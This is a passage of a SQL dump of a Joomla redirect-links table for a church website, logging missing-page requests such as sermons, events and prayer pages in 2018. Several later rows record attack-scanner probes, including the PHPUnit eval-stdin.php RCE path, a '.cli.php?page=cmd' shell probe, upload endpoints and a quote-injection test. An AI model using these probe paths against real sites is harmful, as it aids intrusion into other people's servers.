(8050, 'https://lifeoasisinternationalchurch.org/index.php/tutorials/the-church', NULL, '', '', 5, 0, '2018-04-22 21:37:04', '0000-00-00 00:00:00', 301),
(8051, 'https://www.lifeoasisinternationalchurch.org/branches+churches+in+lekki&tbo=1', NULL, 'https://www.google.com/search?hl=en&q=churches in lekki&num=100&start=100', '', 2, 0, '2018-04-23 13:34:35', '0000-00-00 00:00:00', 301),
(8052, 'https://lifeoasisinternationalchurch.org/videos/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2018-04-23 16:02:24', '0000-00-00 00:00:00', 301),
(8053, 'https://lifeoasisinternationalchurch.org/event', NULL, '', '', 1, 0, '2018-04-24 19:50:44', '0000-00-00 00:00:00', 301),
(8054, 'https://lifeoasisinternationalchurch.org/ministries/ljmti/11-ministries', NULL, '', '', 7, 0, '2018-04-24 22:26:20', '0000-00-00 00:00:00', 301),
(8055, 'https://lifeoasisinternationalchurch.org/ministries/ljmti/12-resources', NULL, '', '', 7, 0, '2018-04-24 22:26:25', '0000-00-00 00:00:00', 301),
(8056, 'https://lifeoasisinternationalchurch.org/ministries/ljmti/14-contact-us', NULL, '', '', 7, 0, '2018-04-24 22:26:29', '0000-00-00 00:00:00', 301),
(8057, 'https://lifeoasisinternationalchurch.org/ministries/ljmti/16-divine-instructions', NULL, '', '', 7, 0, '2018-04-24 22:26:34', '0000-00-00 00:00:00', 301),
(8058, 'https://lifeoasisinternationalchurch.org/template-info/musci', NULL, '', '', 8, 0, '2018-04-24 22:28:05', '0000-00-00 00:00:00', 301),
(8059, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/01/15', NULL, '', '', 8, 0, '2018-04-24 22:28:14', '0000-00-00 00:00:00', 301),
(8060, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/02/15', NULL, '', '', 8, 0, '2018-04-24 22:28:19', '0000-00-00 00:00:00', 301),
(8061, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/03/15', NULL, '', '', 8, 0, '2018-04-24 22:28:23', '0000-00-00 00:00:00', 301),
(8062, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/04/15', NULL, '', '', 8, 0, '2018-04-24 22:28:28', '0000-00-00 00:00:00', 301),
(8063, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/05/15', NULL, '', '', 8, 0, '2018-04-24 22:28:32', '0000-00-00 00:00:00', 301),
(8064, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/06/15', NULL, '', '', 8, 0, '2018-04-24 22:28:37', '0000-00-00 00:00:00', 301),
(8065, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/07/15', NULL, '', '', 8, 0, '2018-04-24 22:28:41', '0000-00-00 00:00:00', 301),
(8066, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/08/15', NULL, '', '', 8, 0, '2018-04-24 22:28:45', '0000-00-00 00:00:00', 301),
(8067, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/09/15', NULL, '', '', 8, 0, '2018-04-24 22:28:50', '0000-00-00 00:00:00', 301),
(8068, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/10/15', NULL, '', '', 8, 0, '2018-04-24 22:28:54', '0000-00-00 00:00:00', 301),
(8069, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/11/15', NULL, '', '', 8, 0, '2018-04-24 22:28:59', '0000-00-00 00:00:00', 301),
(8070, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/12/15', NULL, '', '', 8, 0, '2018-04-24 22:29:03', '0000-00-00 00:00:00', 301),
(8071, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/13/15', NULL, '', '', 8, 0, '2018-04-24 22:29:08', '0000-00-00 00:00:00', 301),
(8072, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/14/15', NULL, '', '', 8, 0, '2018-04-24 22:29:12', '0000-00-00 00:00:00', 301),
(8073, 'https://lifeoasisinternationalchurch.org/testimonies/day.listevents/2011/09/15/15', NULL, '', '', 8, 0, '2018-04-24 22:29:17', '0000-00-00 00:00:00', 301),
(8074, 'https://www.lifeoasisinternationalchurch.org/2-video', NULL, '', '', 25, 0, '2018-04-24 22:34:05', '0000-00-00 00:00:00', 301),
(8075, 'https://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/11-about-joomla', NULL, '', '', 21, 0, '2018-04-24 22:35:02', '0000-00-00 00:00:00', 301),
(8076, 'https://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/6-integrated-extensions', NULL, '', '', 26, 0, '2018-04-24 22:35:11', '0000-00-00 00:00:00', 301),
(8077, 'https://www.lifeoasisinternationalchurch.org/component/content/category/11-demo-articles', NULL, '', '', 21, 0, '2018-04-24 22:35:28', '0000-00-00 00:00:00', 301),
(8078, 'https://www.lifeoasisinternationalchurch.org/component/prayercenter/?task=newreq&itemid=10111', NULL, '', '', 12, 0, '2018-04-24 22:35:50', '0000-00-00 00:00:00', 301),
(8079, 'https://www.lifeoasisinternationalchurch.org/component/prayercenter/?task=subscribe&itemid=10111', NULL, '', '', 12, 0, '2018-04-24 22:35:54', '0000-00-00 00:00:00', 301),
(8080, 'https://www.lifeoasisinternationalchurch.org/component/prayercenter/?task=view&itemid=10111', NULL, '', '', 12, 0, '2018-04-24 22:35:59', '0000-00-00 00:00:00', 301),
(8081, 'https://www.lifeoasisinternationalchurch.org/component/prayercenter/?task=view_devotion&itemid=10111', NULL, '', '', 12, 0, '2018-04-24 22:36:03', '0000-00-00 00:00:00', 301),
(8082, 'https://www.lifeoasisinternationalchurch.org/component/prayercenter/?task=view_links&itemid=10111', NULL, '', '', 12, 0, '2018-04-24 22:36:07', '0000-00-00 00:00:00', 301),
(8083, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2000/07/13/34', NULL, '', '', 7, 0, '2018-04-24 22:36:21', '0000-00-00 00:00:00', 301),
(8084, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2000/11/01/34', NULL, '', '', 7, 0, '2018-04-24 22:36:26', '0000-00-00 00:00:00', 301),
(8085, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2000/12/17/34', NULL, '', '', 7, 0, '2018-04-24 22:36:30', '0000-00-00 00:00:00', 301),
(8086, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/07/34', NULL, '', '', 7, 0, '2018-04-24 22:36:34', '0000-00-00 00:00:00', 301),
(8087, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/08/34', NULL, '', '', 7, 0, '2018-04-24 22:36:39', '0000-00-00 00:00:00', 301),
(8088, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/09/34', NULL, '', '', 7, 0, '2018-04-24 22:36:43', '0000-00-00 00:00:00', 301),
(8089, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/10/34', NULL, '', '', 7, 0, '2018-04-24 22:36:47', '0000-00-00 00:00:00', 301),
(8090, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/11/34', NULL, '', '', 7, 0, '2018-04-24 22:36:52', '0000-00-00 00:00:00', 301),
(8091, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/12/34', NULL, '', '', 7, 0, '2018-04-24 22:36:56', '0000-00-00 00:00:00', 301),
(8092, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/13/34', NULL, '', '', 7, 0, '2018-04-24 22:37:00', '0000-00-00 00:00:00', 301),
(8093, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/14/34', NULL, '', '', 7, 0, '2018-04-24 22:37:05', '0000-00-00 00:00:00', 301),
(8094, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/15/34', NULL, '', '', 7, 0, '2018-04-24 22:37:10', '0000-00-00 00:00:00', 301),
(8095, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/16/34', NULL, '', '', 7, 0, '2018-04-24 22:37:14', '0000-00-00 00:00:00', 301),
(8096, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/17/34', NULL, '', '', 6, 0, '2018-04-24 22:37:18', '0000-00-00 00:00:00', 301),
(8097, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/18/34', NULL, '', '', 7, 0, '2018-04-24 22:37:23', '0000-00-00 00:00:00', 301),
(8098, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/19/34', NULL, '', '', 7, 0, '2018-04-24 22:37:27', '0000-00-00 00:00:00', 301),
(8099, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/20/34', NULL, '', '', 7, 0, '2018-04-24 22:37:31', '0000-00-00 00:00:00', 301),
(8100, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/21/34', NULL, '', '', 7, 0, '2018-04-24 22:37:36', '0000-00-00 00:00:00', 301),
(8101, 'https://lifeoasisinternationalchurch.org/asom2018/index.php/component/ajax/?format=json', NULL, 'https://lifeoasisinternationalchurch.org/asom2018/', '', 1, 0, '2018-04-24 23:12:18', '0000-00-00 00:00:00', 301),
(8102, 'https://lifeoasisinternationalchurch.org/asom2018/', NULL, '', '', 34, 0, '2018-04-24 23:47:52', '0000-00-00 00:00:00', 301),
(8103, 'https://lifeoasisinternationalchurch.org/asom2018/index.php', NULL, '', '', 133, 0, '2018-04-24 23:47:54', '0000-00-00 00:00:00', 301),
(8104, 'https://lifeoasisinternationalchurch.org/asom2018/index.php/accommodation', NULL, '', '', 133, 0, '2018-04-24 23:47:57', '0000-00-00 00:00:00', 301),
(8105, 'https://lifeoasisinternationalchurch.org/asom2018/index.php/component/users/?view=remind', NULL, '', '', 13, 0, '2018-04-24 23:47:59', '0000-00-00 00:00:00', 301),
(8106, 'https://lifeoasisinternationalchurch.org/asom2018/index.php/component/users/?view=reset', NULL, '', '', 9, 0, '2018-04-24 23:48:01', '0000-00-00 00:00:00', 301),
(8107, 'https://lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/11-about-joomla', NULL, '', '', 19, 0, '2018-04-24 23:48:42', '0000-00-00 00:00:00', 301),
(8108, 'https://lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/53-testing', NULL, '', '', 7, 0, '2018-04-24 23:49:07', '0000-00-00 00:00:00', 301),
(8109, 'https://lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/54-slide-04', NULL, '', '', 7, 0, '2018-04-24 23:49:11', '0000-00-00 00:00:00', 301),
(8110, 'https://lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/6-integrated-extensions', NULL, '', '', 19, 0, '2018-04-24 23:49:16', '0000-00-00 00:00:00', 301),
(8111, 'https://lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/63-disclaimer', NULL, '', '', 19, 0, '2018-04-24 23:49:24', '0000-00-00 00:00:00', 301),
(8112, 'https://lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/7-tutorials-and-guides', NULL, '', '', 7, 0, '2018-04-24 23:49:33', '0000-00-00 00:00:00', 301),
(8113, 'https://lifeoasisinternationalchurch.org/component/content/article/12-sample-content/12-sample-content-1', NULL, '', '', 7, 0, '2018-04-24 23:49:43', '0000-00-00 00:00:00', 301),
(8114, 'https://lifeoasisinternationalchurch.org/component/content/category/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&itemid=189', NULL, '', '', 7, 0, '2018-04-24 23:51:33', '0000-00-00 00:00:00', 301),
(8115, 'https://lifeoasisinternationalchurch.org/component/content/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&itemid=189', NULL, '', '', 8, 0, '2018-04-24 23:51:38', '0000-00-00 00:00:00', 301),
(8116, 'https://lifeoasisinternationalchurch.org/component/prayercenter/?task=newreq&itemid=10111', NULL, '', '', 12, 0, '2018-04-24 23:53:14', '0000-00-00 00:00:00', 301),
(8117, 'https://lifeoasisinternationalchurch.org/component/prayercenter/?task=subscribe&itemid=10111', NULL, '', '', 12, 0, '2018-04-24 23:53:18', '0000-00-00 00:00:00', 301),
(8118, 'https://lifeoasisinternationalchurch.org/component/prayercenter/?task=view&itemid=10111', NULL, '', '', 12, 0, '2018-04-24 23:53:23', '0000-00-00 00:00:00', 301),
(8119, 'https://lifeoasisinternationalchurch.org/component/prayercenter/?task=view_devotion&itemid=10111', NULL, '', '', 12, 0, '2018-04-24 23:53:27', '0000-00-00 00:00:00', 301),
(8120, 'https://lifeoasisinternationalchurch.org/component/prayercenter/?task=view_links&itemid=10111', NULL, '', '', 12, 0, '2018-04-24 23:53:32', '0000-00-00 00:00:00', 301),
(8121, 'https://lifeoasisinternationalchurch.org/asom2018/administrator/index.php', NULL, 'https://lifeoasisinternationalchurch.org/asom2018/administrator/index.php?option=com_vikevents&task=edititem&cid[]=4', '', 1, 0, '2018-04-24 23:59:55', '0000-00-00 00:00:00', 301),
(8122, 'https://lifeoasisinternationalchurch.org/index.php/11-demo-articles/20-welcome', NULL, '', '', 8, 0, '2018-04-25 01:54:11', '0000-00-00 00:00:00', 301),
(8123, 'https://lifeoasisinternationalchurch.org/index.php/18-loic/50-young-achievers', NULL, '', '', 73, 0, '2018-04-25 01:54:16', '0000-00-00 00:00:00', 301),
(8124, 'https://lifeoasisinternationalchurch.org/index.php/2012-11-09-09-57-10/father-s-heart/18-loic/50-young-achievers', NULL, '', '', 73, 0, '2018-04-25 01:54:29', '0000-00-00 00:00:00', 301),
(8125, 'https://lifeoasisinternationalchurch.org/index.php/branches/18-loic/50-young-achievers', NULL, '', '', 73, 0, '2018-04-25 01:54:54', '0000-00-00 00:00:00', 301),
(8126, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/10-preset-styles', NULL, '', '', 73, 0, '2018-04-25 01:55:18', '0000-00-00 00:00:00', 301),
(8127, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/11-about-joomla?tmpl=component&print=1&page=', NULL, '', '', 12, 0, '2018-04-25 01:55:27', '0000-00-00 00:00:00', 301),
(8128, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/20-welcome?tmpl=component&print=1&page=', NULL, '', '', 12, 0, '2018-04-25 01:55:31', '0000-00-00 00:00:00', 301),
(8129, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/5-menu-options', NULL, '', '', 14, 0, '2018-04-25 01:55:36', '0000-00-00 00:00:00', 301),
(8130, 'https://lifeoasisinternationalchurch.org/index.php/component/content/category/11-demo-articles', NULL, '', '', 7, 0, '2018-04-25 01:55:46', '0000-00-00 00:00:00', 301),
(8131, 'https://lifeoasisinternationalchurch.org/index.php/component/content/category/12-sample-content', NULL, '', '', 7, 0, '2018-04-25 01:55:50', '0000-00-00 00:00:00', 301),
(8132, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/serie/1?start=20', NULL, '', '', 10, 0, '2018-04-25 01:56:15', '0000-00-00 00:00:00', 301),
(8133, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/10-grace-2', NULL, '', '', 7, 0, '2018-04-25 01:56:25', '0000-00-00 00:00:00', 301),
(8134, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/11-grace-3', NULL, '', '', 7, 0, '2018-04-25 01:56:30', '0000-00-00 00:00:00', 301),
(8135, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/12-manifesting-spiritual-gifts', NULL, '', '', 7, 0, '2018-04-25 01:56:34', '0000-00-00 00:00:00', 301),
(8136, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/14-entering-into-winning-position-2', NULL, '', '', 8, 0, '2018-04-25 01:56:44', '0000-00-00 00:00:00', 301),
(8137, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/15-entering-into-winning-position-3', NULL, '', '', 7, 0, '2018-04-25 01:56:48', '0000-00-00 00:00:00', 301),
(8138, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/16-entering-into-winning-position-4', NULL, '', '', 7, 0, '2018-04-25 01:56:53', '0000-00-00 00:00:00', 301),
(8139, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/17-entering-into-winning-position-5', NULL, '', '', 7, 0, '2018-04-25 01:56:57', '0000-00-00 00:00:00', 301),
(8140, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/18-army-of-the-lord-1', NULL, '', '', 7, 0, '2018-04-25 01:57:02', '0000-00-00 00:00:00', 301),
(8141, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/19-army-of-the-lord-2', NULL, '', '', 7, 0, '2018-04-25 01:57:06', '0000-00-00 00:00:00', 301),
(8142, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/2-building-a-bilblical-relationship-with-the-word-of-god-2', NULL, '', '', 7, 0, '2018-04-25 01:57:11', '0000-00-00 00:00:00', 301),
(8143, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/20-army-of-the-lord-3', NULL, '', '', 7, 0, '2018-04-25 01:57:16', '0000-00-00 00:00:00', 301),
(8144, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/21-dealing-with-buts-in-your-life', NULL, '', '', 7, 0, '2018-04-25 01:57:20', '0000-00-00 00:00:00', 301),
(8145, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/22-dealing-with-buts-in-your-life-2', NULL, '', '', 7, 0, '2018-04-25 01:57:24', '0000-00-00 00:00:00', 301),
(8146, 'https://lifeoasisinternationalchurch.org/index.php/partnership/18-loic/50-young-achievers', NULL, '', '', 14, 0, '2018-04-25 01:57:34', '0000-00-00 00:00:00', 301),
(8147, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/dream-centre-ordained-pastors/18-loic/50-young-achievers', NULL, '', '', 14, 0, '2018-04-25 01:57:44', '0000-00-00 00:00:00', 301),
(8148, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/rev-oyenike-areogun/18-loic/50-young-achievers', NULL, '', '', 14, 0, '2018-04-25 01:57:52', '0000-00-00 00:00:00', 301),
(8149, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/the-church-2/18-loic/50-young-achievers', NULL, '', '', 14, 0, '2018-04-25 01:58:06', '0000-00-00 00:00:00', 301),
(8150, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/the-church/18-loic/50-young-achievers', NULL, '', '', 7, 0, '2018-04-25 01:58:10', '0000-00-00 00:00:00', 301),
(8151, 'https://lifeoasisinternationalchurch.org/index.php/videos/18-loic/50-young-achievers', NULL, '', '', 73, 0, '2018-04-25 01:58:19', '0000-00-00 00:00:00', 301),
(8152, 'https://lifeoasisinternationalchurch.org/minister/hotel', NULL, '', '', 5, 0, '2018-04-25 01:59:22', '0000-00-00 00:00:00', 301),
(8153, 'https://lifeoasisinternationalchurch.org/minister/wow-manuals', NULL, '', '', 5, 0, '2018-04-25 01:59:26', '0000-00-00 00:00:00', 301),
(8154, 'https://lifeoasisinternationalchurch.org/ministries/ljmti/10-about-us', NULL, '', '', 7, 0, '2018-04-25 01:59:31', '0000-00-00 00:00:00', 301),
(8155, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/22/34', NULL, '', '', 7, 0, '2018-04-25 17:45:24', '0000-00-00 00:00:00', 301),
(8156, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/23/34', NULL, '', '', 7, 0, '2018-04-25 17:45:28', '0000-00-00 00:00:00', 301),
(8157, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/24/34', NULL, '', '', 7, 0, '2018-04-25 17:45:33', '0000-00-00 00:00:00', 301),
(8158, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/25/34', NULL, '', '', 7, 0, '2018-04-25 17:45:38', '0000-00-00 00:00:00', 301),
(8159, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/26/34', NULL, '', '', 7, 0, '2018-04-25 17:45:42', '0000-00-00 00:00:00', 301),
(8160, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/27/34', NULL, '', '', 7, 0, '2018-04-25 17:45:46', '0000-00-00 00:00:00', 301),
(8161, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/28/34', NULL, '', '', 7, 0, '2018-04-25 17:45:51', '0000-00-00 00:00:00', 301),
(8162, 'https://www.lifeoasisinternationalchurch.org/index.php/videos/18-loic/50-young-achievers', NULL, '', '', 9, 0, '2018-04-25 17:46:28', '0000-00-00 00:00:00', 301),
(8163, 'https://www.lifeoasisinternationalchurch.org/minister/registration', NULL, '', '', 2, 0, '2018-04-25 17:47:24', '0000-00-00 00:00:00', 301),
(8164, 'https://www.lifeoasisinternationalchurch.org/minister/wow-manuals', NULL, '', '', 2, 0, '2018-04-25 17:47:28', '0000-00-00 00:00:00', 301),
(8165, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=rauawwib5r0', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 2, 0, '2018-04-25 21:29:09', '0000-00-00 00:00:00', 301),
(8166, 'https://www.lifeoasisinternationalchurch.org/about-us/our-founder\'a=0', NULL, 'https://www.lifeoasisinternationalchurch.org/about-us/our-founder\'A=0', '', 2, 0, '2018-04-26 02:01:52', '0000-00-00 00:00:00', 301),
(8167, 'https://142.4.21.132/vendor/phpunit/phpunit/src/util/filter.php', NULL, '', '', 2, 0, '2018-04-26 05:42:34', '0000-00-00 00:00:00', 301),
(8168, 'https://www.lifeoasisinternationalchurch.org/programmes.php', NULL, '', '', 20, 0, '2018-04-26 06:35:54', '0000-00-00 00:00:00', 301),
(8169, 'https://lifeoasisinternationalchurch.org/church-groups', NULL, '', '', 4, 0, '2018-04-26 11:39:11', '0000-00-00 00:00:00', 301),
(8170, 'https://www.lifeoasisinternationalchurch.org/50-prayer-a-fasting-day-40', NULL, '', '', 8, 0, '2018-04-27 20:53:43', '0000-00-00 00:00:00', 301),
(8171, 'https://lifeoasisinternationalchurch.org/.../142-captainmarketing', NULL, 'https://lifeoasisinternationalchurch.org/', '', 9, 0, '2018-04-28 02:43:01', '0000-00-00 00:00:00', 301),
(8172, 'https://lifeoasisinternationalchurch.org/index.php/template-info/ljmti', NULL, '', '', 5, 0, '2018-04-28 11:56:37', '0000-00-00 00:00:00', 301),
(8173, 'https://lifeoasisinternationalchurch.org/asom-2014-online-registration', NULL, '', '', 13, 0, '2018-04-28 22:20:50', '0000-00-00 00:00:00', 301),
(8174, 'https://lifeoasisinternationalchurch.org/resources/salvation/18-loic/50-young-achievers', NULL, '', '', 16, 0, '2018-04-29 05:01:45', '0000-00-00 00:00:00', 301),
(8175, 'https://www.lifeoasisinternationalchurch.org/pastors\' service', NULL, '', '', 1, 0, '2018-04-29 06:56:34', '0000-00-00 00:00:00', 301),
(8176, 'https://lifeoasisinternationalchurch.org/str', NULL, '', '', 25, 0, '2018-04-29 07:38:24', '0000-00-00 00:00:00', 301),
(8177, 'https://www.lifeoasisinternationalchurch.org/17-prayer-a-fasting-day-8', NULL, '', '', 7, 0, '2018-04-29 11:55:42', '0000-00-00 00:00:00', 301),
(8178, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/14-prayer-a-fasting-day-5', NULL, '', '', 1, 0, '2018-04-30 16:33:37', '0000-00-00 00:00:00', 301),
(8179, 'https://lifeoasisinternationalchurch.org/resources/livestreamingensitivity', NULL, '', '', 1, 0, '2018-05-02 05:25:23', '0000-00-00 00:00:00', 301),
(8180, 'https://lifeoasisinternationalchurch.org/resources/livestreamingensitiv', NULL, '', '', 1, 0, '2018-05-02 05:26:29', '0000-00-00 00:00:00', 301),
(8181, 'https://lifeoasisinternationalchurch.org/ckfinder/ckfinder.html', NULL, '', '', 1, 0, '2018-05-03 01:08:11', '0000-00-00 00:00:00', 301),
(8182, 'https://secure-store.nike.comhttps//secure-store.nike.com/ap/services/jcartservice?action=additem&lang_locale=en_gb&country=sg&catalogid=7&productid=12209499&price=229&qty=1&skuandsize=21363159:8&rt=json&view=3&_=1525341119664&skuid=21363159&displaysize=8', NULL, 'https://m.nike.com/sg/en_gb/pd/epic-react-flyknit-running-shoe/pid-12209499/pgid-12326462', '', 1, 0, '2018-05-03 09:20:23', '0000-00-00 00:00:00', 301),
(8183, 'https://lifeoasisinternationalchurch.org/phpinfoer.php', NULL, '', '', 2, 0, '2018-05-03 16:07:19', '0000-00-00 00:00:00', 301),
(8184, 'https://lifeoasisinternationalchurch.org/vendor/phpunit/phpunit/src/util/php/eval-stdin.php', NULL, 'http://lifeoasisinternationalchurch.org/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', '', 8, 0, '2018-05-03 17:37:33', '0000-00-00 00:00:00', 301),
(8185, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming/school of calling 2018', NULL, '', '', 1, 0, '2018-05-04 10:08:11', '0000-00-00 00:00:00', 301),
(8186, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/our-service-schedule', NULL, '', '', 1, 0, '2018-05-04 13:04:22', '0000-00-00 00:00:00', 301),
(8187, 'https://lifeoasisinternationalchurch.org/2011-08-10-21-22-58', NULL, '', '', 20, 0, '2018-05-04 19:09:55', '0000-00-00 00:00:00', 301),
(8188, 'https://store.nike.comhttp//store.nike.com/ap/services/jcartservice', NULL, 'https://m.nike.com/sg/en_gb/pd/epic-react-flyknit-running-shoe/pid-12209499/pgid-12326462', '', 3, 0, '2018-05-04 21:54:16', '0000-00-00 00:00:00', 301),
(8189, 'https://lifeoasisinternationalchurch.org/assets/ckfinder/ckfinder.html', NULL, '', '', 1, 0, '2018-05-04 22:24:30', '0000-00-00 00:00:00', 301),
(8190, 'https://lifeoasisinternationalchurch.org/ttaining', NULL, '', '', 1, 0, '2018-05-06 14:39:24', '0000-00-00 00:00:00', 301),
(8191, 'https://www.lifeoasisinternationalchurch.org/component/k2/item/', NULL, '', '', 4, 0, '2018-05-06 18:12:28', '0000-00-00 00:00:00', 301),
(8192, 'https://lifeoasisinternationalchurch.org/wp-pols.php', NULL, '', '', 1, 0, '2018-05-06 23:48:31', '0000-00-00 00:00:00', 301),
(8193, 'https://lifeoasisinternationalchurch.org/12-sample-content/14-sample-content-3', NULL, '', '', 1, 0, '2018-05-07 01:08:07', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(8194, 'https://lifeoasisinternationalchurch.org/audio', NULL, '', '', 2, 0, '2018-05-07 05:40:52', '0000-00-00 00:00:00', 301),
(8195, 'https://lifeoasisinternationalchurch.org/plugins/jquery-file-upload/server/php/', NULL, 'http://lifeoasisinternationalchurch.org/plugins/jquery-file-upload/server/php/', '', 1, 0, '2018-05-07 05:50:14', '0000-00-00 00:00:00', 301),
(8196, 'https://lifeoasisinternationalchurch.org/streaming/telegram', NULL, '', '', 1, 0, '2018-05-07 06:26:20', '0000-00-00 00:00:00', 301),
(8197, 'https://lifeoasisinternationalchurch.org/screaming', NULL, '', '', 2, 0, '2018-05-07 06:37:03', '0000-00-00 00:00:00', 301),
(8198, 'https://www.lifeoasisinternationalchurch.org/streamingday6', NULL, '', '', 1, 0, '2018-05-07 08:30:29', '0000-00-00 00:00:00', 301),
(8199, 'https://lifeoasisinternationalchurch.org/console', NULL, '', '', 11, 0, '2018-05-07 08:58:16', '0000-00-00 00:00:00', 301),
(8200, 'https://music.lifeoasisinternationalchurch.org/v68.txt/', NULL, '', '', 1, 0, '2018-05-07 09:08:47', '0000-00-00 00:00:00', 301),
(8201, 'https://music.lifeoasisinternationalchurch.org/', NULL, '', '', 10, 0, '2018-05-07 09:08:49', '0000-00-00 00:00:00', 301),
(8202, 'https://music.lifeoasisinternationalchurch.org/struts2-rest-showcase/orders/3', NULL, '', '', 2, 0, '2018-05-07 09:09:02', '0000-00-00 00:00:00', 301),
(8203, 'https://lifeoasisinternationalchurch.org/db_z.php', NULL, '', '', 2, 0, '2018-05-09 03:55:52', '0000-00-00 00:00:00', 301),
(8204, 'https://lifeoasisinternationalchurch.org/.cli.php?page=cmd', NULL, '', '', 1, 0, '2018-05-09 05:55:17', '0000-00-00 00:00:00', 301),
(8205, 'https://lifeoasisinternationalchurch.org/consystem.php', NULL, '', '', 2, 0, '2018-05-09 16:39:58', '0000-00-00 00:00:00', 301),
(8206, 'https://lifeoasisinternationalchurch.org/35thanniversary', NULL, '', '', 1, 0, '2018-05-09 21:14:31', '0000-00-00 00:00:00', 301),
(8207, 'https://lifeoasisinternationalchurch.org/35thanniversar', NULL, '', '', 1, 0, '2018-05-10 09:04:10', '0000-00-00 00:00:00', 301),
(8208, 'https://lifeoasisinternationalchurch.org/bigdump.php', NULL, '', '', 4, 0, '2018-05-10 15:26:26', '0000-00-00 00:00:00', 301),
(8209, 'https://lifeoasisinternationalchurch.org/trainee', NULL, '', '', 1, 0, '2018-05-10 16:32:16', '0000-00-00 00:00:00', 301),
(8210, 'https://www.lifeoasisinternationalchurch.org/partnership/20-demo/', NULL, '', '', 3, 0, '2018-05-10 21:39:27', '0000-00-00 00:00:00', 301),
